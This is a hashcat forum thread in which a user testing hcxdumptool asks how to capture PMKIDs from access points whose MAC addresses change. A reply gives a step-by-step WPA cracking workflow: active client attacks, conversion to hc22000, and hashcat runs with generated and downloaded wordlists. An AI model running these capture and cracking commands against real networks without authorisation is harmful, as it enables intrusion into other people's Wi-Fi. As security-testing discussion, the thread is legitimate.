Q related to hcxtools - Printable Version

Q related to hcxtools - Printable Version

+- hashcat Forum (https://hashcat.net/forum)
+-- Forum: Misc (https://hashcat.net/forum/forum-15.html)
+--- Forum: User Contributions (https://hashcat.net/forum/forum-25.html)
+--- Thread: Q related to hcxtools (/thread-10342.html)

Q related to hcxtools - damien - 09-20-2021

Hi all,

I am testing hcxdumptool in an environment where there are no autonomous wireless access points, but instead a lightweight access point which get there config via a wireless controller. I does not seems to work, because the MAC address of the wireless access point changes anytime. As a result I cannot use a filter to attack a specific wireless access point.

Any advice on how to try to get the PMKID in this situation ?

regards
Damien

RE: Q related to hcxtools - ZerBea - 09-20-2021

I don't think that this kind of AP is using PMKID caching, because that doesn't make sense if the MAC changes often.
Please notice that the PMKID depend on the MAC:

Code:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Maybe one of the CLIENTs of this NETWORK is weak (M1M2ROGUE). Try to attack them instead of the hardened AP:

Code:
$ hcdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100

Run the attack for some hours, to make sure to get as much as possible information from CLIENTs.

If there are other APs or CLIENTs in range that you are not targeting, I recommend to protect them by BPFC.
from --help:
create BPF to protect a MAC

Code:
$ tcpdump -i <interface> not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf

add all MACs to protect (each MAC as addr1 and addr2) separated by "and not wlan"
and run hcxdumptool with activated BPF:

Code:
$ hcdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100 --bpfc=protect.bpf

Then convert to hc22000:

Code:
$ hcxpcapngtool -E wl -I wl -U wl --all -o test.hc22000 dumpfile.pcapng

Please notice:
We have to use --all, because NC is currently broken on hashcat.
https://hashcat.net/forum/thread-10253-post-53602.html#pid53602l

Now use hashcat on the recorded traffic as a first attempt:

Code:
$ hashcat -m 22000 test.hc22000 wl

proceed with hcxpsktool:

Code:
$ hcxpsktool -c test.hc22000 --weakpass --eudate --usdate --wpskeys | hashcat -m 22000 test.hc22000

proceed with wpa-sec confirmed lists:

Code:
$ wget https://wpa-sec.stanev.org/dict/rkg.txt.gz

$ hashcat -m 22000 test.hc22000 rkg.txt.gz

$ wget https://wpa-sec.stanev.org/dict/cracked.txt.gz

$ hashcat -m 22000 test.hc22000 cracked.txt.gz

If that doesn't work, do some open sources intelligence (OSINT) by DuckDuckGo picture search and try some masks and rules.
This wordlists may be useful, too:
https://3wifi.stascorp.com/3wifi-dic-2021-09-03.7z
https://hashmob.net/downloads